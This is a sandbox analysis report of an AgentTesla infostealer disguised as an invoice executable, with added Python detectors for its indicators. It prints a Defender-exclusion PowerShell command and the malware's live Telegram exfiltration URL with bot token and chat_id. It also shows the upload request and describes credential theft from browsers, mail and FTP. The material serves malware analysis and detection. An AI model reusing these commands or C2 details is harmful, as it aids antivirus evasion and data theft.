
Windows Analysis Report
COMMERCIAL INVOICE - BL - AWB 7032805642.exe

Overview

General Information

Sample name: COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Analysis ID: 1446730
MD5: 7831435dbf79df5631126a63a722cf35
SHA1: 2380acbc54642882a4a3ebaa0a892eda4ea50b96
SHA256: b4c52779d09ea4edabef9ef75c2756cdd9a1fc0c10564ea7cd153ca223d0a9d8
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Disables UAC (registry)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • COMMERCIAL INVOICE - BL - AWB 7032805642.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" MD5: 7831435DBF79DF5631126A63A722CF35)
    • powershell.exe (PID: 7180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 7204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • AddInProcess32.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
    • WerFault.exe (PID: 7376 cmdline: C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage?chat_id=6392451645"}
Yara matches in PCAP:
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches in memory dumps (first 5 of 15 entries shown):
Source | Rule | Description | Author
00000004.00000002.2464175604.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches in unpacked PE files (first 5 of 15 entries shown):
Source | Rule | Description | Author
0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
4.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  Matched strings:
  • 0x31e84:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x31ef6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31f80:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32012:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3207c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x320ee:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32184:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32214:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
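The INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID hit above is a plain string match on Windows vault schema GUIDs. As an added example (not part of the Joe Sandbox report and not the rule's own code), the following Python scanner reproduces that check outside Yara on a constructed buffer: it looks for the GUIDs both as ASCII and as UTF-16LE (the encoding .NET uses for string literals, so an ASCII-only scan can miss them) and case-insensitively, and reports the offset and encoding of each hit, the way the report lists 0x31e84 and friends. The schema names are the labels commonly documented for these GUIDs, and the three-distinct-GUIDs threshold is this example's own assumption, not the rule's condition.

```python
import re

# Windows vault schema GUIDs matched by the Yara rule above, with the labels
# commonly documented for them (vaultcli / credential-manager listings).
VAULT_SCHEMA_GUIDS = {
    "2F1A6504-0641-44CF-8BB5-3612D865F2E5": "Windows Secure Note",
    "3CCD5499-87A8-4B10-A215-608888DD3B55": "Windows Web Password Credential",
    "154E23D0-C644-4E6F-8CE6-5069272F999F": "Windows Credential Picker Protector",
    "4BF4C442-9B8A-41A0-B380-DD4A704DDB28": "Web Credentials",
    "77BC582B-F0A6-4E15-4E80-61736B6F3B29": "Windows Credentials",
    "E69D7838-91B5-4FC9-89D5-230D4D4CC2BC": "Windows Domain Certificate Credential",
    "3E0E35BE-1B77-43E7-B873-AED901B6275B": "Windows Domain Password Credential",
    "3C886FF3-2669-4AA2-A8FB-3F6759A77548": "Windows Extended Credential",
}
# Assumed threshold for this example (not the Yara rule's condition):
# referencing three distinct vault schemas is treated as an infostealer indicator.
MIN_DISTINCT_SCHEMAS = 3


def _patterns():
    """Case-insensitive byte patterns for every GUID, in ASCII and in UTF-16LE."""
    for guid, label in VAULT_SCHEMA_GUIDS.items():
        yield guid, label, "ascii", re.compile(re.escape(guid.encode("ascii")), re.I)
        yield guid, label, "utf-16le", re.compile(re.escape(guid.encode("utf-16-le")), re.I)


def scan_vault_guids(data: bytes) -> list[dict]:
    """Return every vault schema GUID found in data, sorted by file offset."""
    hits = []
    for guid, label, encoding, pat in _patterns():
        for m in pat.finditer(data):
            hits.append({"offset": m.start(), "guid": guid, "label": label, "encoding": encoding})
    return sorted(hits, key=lambda h: h["offset"])


def assess(hits: list[dict]) -> dict:
    """Summarise distinct schemas referenced and apply the assumed threshold."""
    distinct = {h["guid"] for h in hits}
    return {
        "distinct_schemas": len(distinct),
        "vault_reference_indicator": len(distinct) >= MIN_DISTINCT_SCHEMAS,
        "labels": sorted(VAULT_SCHEMA_GUIDS[g] for g in distinct),
    }


def build_sample() -> bytes:
    """Constructed test buffer (not the sample from the report): one ASCII GUID,
    one UTF-16LE GUID as .NET stores string literals, one lowercase ASCII GUID."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"

    def put(off: int, blob: bytes) -> None:
        buf[off:off + len(blob)] = blob

    put(0x40, b"2F1A6504-0641-44CF-8BB5-3612D865F2E5")
    put(0x80, "4BF4C442-9B8A-41A0-B380-DD4A704DDB28".encode("utf-16-le"))
    put(0x100, b"77bc582b-f0a6-4e15-4e80-61736b6f3b29")
    return bytes(buf)


if __name__ == "__main__":
    found = scan_vault_guids(build_sample())
    for h in found:
        print(f"0x{h['offset']:x} {h['encoding']:8} {h['guid']}  ({h['label']})")
    print(assess(found))
```

To run this against a real unpacked image, pass the file's bytes to scan_vault_guids; the offsets it prints are file offsets in that image, comparable to the 0x31e84-style values in the Yara output above.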

                      System Summary

Sigma matches: three rules (two by Florian Roth (Nextron Systems), one by Roberto Rodriguez @Cyb3rWard0g (rule) and oscd.community (improvements)) fired on the same process-start event:
  • Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force
  • CommandLine|base64offset|contains: ~2yzw
  • Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ProcessId: 7180, ProcessName: powershell.exe
  • ParentCommandLine: "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"
  • ParentImage: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe
  • ParentProcessId: 3648, ParentProcessName: COMMERCIAL INVOICE - BL - AWB 7032805642.exe

Snort alert:
  • Timestamp: 05/23/24-20:22:01.486017
  • SID: 2851779
  • Source Port: 49711
  • Destination Port: 443
  • Protocol: TCP
  • Classtype: A Network Trojan was detected
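The Sigma rules above trigger on the plain-text Add-MpPreference command line recorded in the process tree. As an added example (not part of the Joe Sandbox report and not the sample's code), the following Python detector runs over constructed Sysmon-style process-creation events and covers the two behaviours this report shows: a Defender exclusion added from PowerShell, in both the clear and the -EncodedCommand form the "Base64 Encoded MpPreference Cmdlet" rule targets, with an extra flag when the excluded path is the parent process itself, and the .NET host AddInProcess32.exe being started by a parent in a user-writable directory, which is the injection target in this report. The event field names, the finding labels and the list of monitored .NET hosts are this example's assumptions.

```python
import base64
import binascii
import re


def _enc(script: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed Sysmon-style process-creation events (not the sandbox's own export).
# PIDs 7180 and 7204 reproduce command lines from the process tree above; 9001 is an
# -EncodedCommand variant built here; 9002 is benign administration.
SAMPLE_EVENTS = [
    {"ProcessId": 7180,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
                    r'-ExclusionPath "C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe" -Force',
     "ParentImage": r"C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"},
    {"ProcessId": 7204,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"',
     "ParentImage": r"C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe"},
    {"ProcessId": 9001,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -enc "
                    + _enc(r'Set-MpPreference -ExclusionProcess "C:\Users\user\AppData\Local\Temp\x.exe"'),
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe"},
    {"ProcessId": 9002,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-MpPreference"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# -EncodedCommand and its accepted abbreviations, followed by the base64 payload.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]{8,})", re.I)
MPPREF_RE = re.compile(r"\b(Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b", re.I | re.S)
EXCL_ARG_RE = re.compile(r'-Exclusion(?:Path|Process)\s+(?:"([^"]*)"|(\S+))', re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData)\\", re.I)
# CLR host abused as the injection target in this report (assumed list; extend with
# other .NET hosts that never legitimately start from a user-writable parent).
DOTNET_HOSTS = {"addinprocess32.exe"}


def effective_command(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload so the regexes see the cmdlet in clear."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return cmdline
    return f"{cmdline} <decoded: {decoded}>"


def analyse(event: dict) -> list[str]:
    """Return the finding labels (assumed names) that apply to one event."""
    findings: list[str] = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "")
    cmd = effective_command(event.get("CommandLine", ""))
    if image in {"powershell.exe", "pwsh.exe"}:
        m = MPPREF_RE.search(cmd)
        if m:
            findings.append(f"defender_exclusion:{m.group(1)}-MpPreference -Exclusion{m.group(2)}")
            if USER_WRITABLE_RE.search(parent):
                findings.append("exclusion_from_user_writable_parent")
            a = EXCL_ARG_RE.search(cmd)
            excluded = (a.group(1) or a.group(2)) if a else ""
            # The sample excluded its own path: the strongest single signal here.
            if excluded and excluded.lower() == parent.lower():
                findings.append("self_exclusion")
    if image in DOTNET_HOSTS and USER_WRITABLE_RE.search(parent):
        findings.append(f"dotnet_host_spawned_by_user_writable_parent:{image}")
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    return {e["ProcessId"]: analyse(e) for e in events}


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits or "clean")
```

The decode step matters because PowerShell's -EncodedCommand takes UTF-16LE, not UTF-8: decoding the base64 as UTF-8 yields NUL-interleaved text that a plain "Add-MpPreference" substring match never sees.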


                      AV Detection

Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Avira: detected
Source: 4.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage?chat_id=6392451645"}
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe.3648.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage"}
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.6% probability

                      Exploits

Source: Yara match | File source: 00000000.00000002.1330921589.0000019865ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: COMMERCIAL INVOICE - BL - AWB 7032805642.exe PID: 3648, type: MEMORYSTR
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Windows.Forms.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Dynamic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdbH source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb0X source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF4A7.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF4A7.tmp.dmp.8.dr

                      Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.10:49711 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
  POST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8dc7b33b51b57f3
  Host: api.telegram.org
  Content-Length: 912
  Expect: 100-continue
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1 (same request and headers as above)
Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.8.dr | String found in binary or memory: http://upx.sf.net
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/
Source: AddInProcess32.exe, 00000004.00000002.2464175604.0000000002C42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | String found in binary or memory: https://www.google.ru/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49711 version: TLS 1.2
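Every network artefact in this section points at a single Telegram bot. As an added example (not part of the Joe Sandbox report), the following Python helper pulls the bot id, a redacted token, the API method and the chat_id out of the three kinds of artefact the report recorded (extracted configuration URLs, memory strings and the raw HTTP request), only trusts a request as Telegram C2 when its Host header really is api.telegram.org, records the absence of a User-Agent header that the "HTTP GET or POST without a user agent" signature refers to, and rolls everything up per bot id. The sample inputs are copied from this report; the record layout, the redaction format and the token hash used for sharing are this example's own choices.

```python
import hashlib
import re

# Telegram Bot API path shape: /bot<bot_id>:<secret>/<method>
TELEGRAM_PATH_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]{30,45})(?:/([A-Za-z]+))?")
CHAT_ID_RE = re.compile(r"chat_id=(-?\d+)")
REQUEST_LINE_RE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]", re.M)
HEADER_RE = re.compile(r"^([A-Za-z-]+):\s*(.*?)\r?$", re.M)

# Inputs copied from the report above: two config-extractor URLs, one memory string
# and the recorded POST. Nothing here is fetched live.
CONFIG_STRINGS = {
    "config:AgentTesla": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage?chat_id=6392451645",
    "config:TelegramRAT": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendMessage",
    "memory:AddInProcess32.exe": "https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument",
}
HTTP_REQUEST = "\r\n".join([
    "POST /bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument HTTP/1.1",
    "Content-Type: multipart/form-data; boundary=---------------------------8dc7b33b51b57f3",
    "Host: api.telegram.org",
    "Content-Length: 912",
    "Expect: 100-continue",
    "Connection: Keep-Alive",
    "", "",
])


def redact_token(secret: str) -> str:
    """Enough to correlate between reports by eye, not enough to call the API."""
    return f"{secret[:4]}...{secret[-3:]}" if len(secret) > 10 else "..."


def parse_artifact(text: str, origin: str) -> list[dict]:
    """Extract bot IOCs from any text: config JSON, memory string, URL or request path."""
    hits = []
    for m in TELEGRAM_PATH_RE.finditer(text):
        bot_id, secret, method = m.group(1), m.group(2), m.group(3) or ""
        # chat_id rides in the query string right after the method on sendMessage URLs
        chat = CHAT_ID_RE.search(text, m.end(), m.end() + 120)
        hits.append({
            "origin": origin,
            "bot_id": bot_id,
            "token_redacted": redact_token(secret),
            # Hash of the full token lets teams match IOCs without exchanging the secret.
            "token_sha256": hashlib.sha256(f"{bot_id}:{secret}".encode()).hexdigest(),
            "method": method,
            "chat_id": chat.group(1) if chat else "",
        })
    return hits


def parse_http_request(raw: str, origin: str) -> list[dict]:
    """Treat a request as Telegram C2 only if the Host header is api.telegram.org."""
    line = REQUEST_LINE_RE.search(raw)
    headers = {k.lower(): v for k, v in HEADER_RE.findall(raw)}
    if not line or headers.get("host", "").lower() != "api.telegram.org":
        return []
    hits = parse_artifact(line.group(2), origin)
    for h in hits:
        h["http_method"] = line.group(1)
        h["user_agent_present"] = "user-agent" in headers
    return hits


def summarise(hits: list[dict]) -> dict[str, dict]:
    """One row per bot id: methods used, chat_ids seen and the artefacts each came from."""
    out: dict[str, dict] = {}
    for h in hits:
        row = out.setdefault(h["bot_id"], {"token_redacted": h["token_redacted"],
                                           "methods": set(), "chat_ids": set(), "origins": set()})
        if h["method"]:
            row["methods"].add(h["method"])
        if h["chat_id"]:
            row["chat_ids"].add(h["chat_id"])
        row["origins"].add(h["origin"])
    return out


def collect() -> dict[str, dict]:
    hits = [h for origin, s in CONFIG_STRINGS.items() for h in parse_artifact(s, origin)]
    hits += parse_http_request(HTTP_REQUEST, "pcap:sslproxydump")
    return summarise(hits)


if __name__ == "__main__":
    for bot_id, row in collect().items():
        print(bot_id, row)
```

The roll-up shows why the "Telegram RAT" and "AgentTesla" extractor outputs are not two C2 channels: both carry the same bot id, and only the AgentTesla URL adds the chat_id.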

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, R1W.cs | .Net Code: bZROq

                      System Summary

Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198757898c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.1987578f8c4.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.COMMERCIAL INVOICE - BL - AWB 7032805642.exe.198756f1a78.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: initial sample | Static PE information: Filename: COMMERCIAL INVOICE - BL - AWB 7032805642.exe
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C18631A8
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C1830A04
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C18313D9
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C1833338
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C18316B5
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C185B0D0
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C1853100
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C1832608
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Code function: 0_2_00007FF7C194060B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_02B34A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_02B33E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_02B3CFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_02B39D02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_02B34180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_065B3500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_02B3D350
Source: C:\Users\user\Desktop\COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 1124
Source: COMMERCIAL INVOICE - BL - AWB 7032805642.exe | Static PE information: No import functions for PE file found
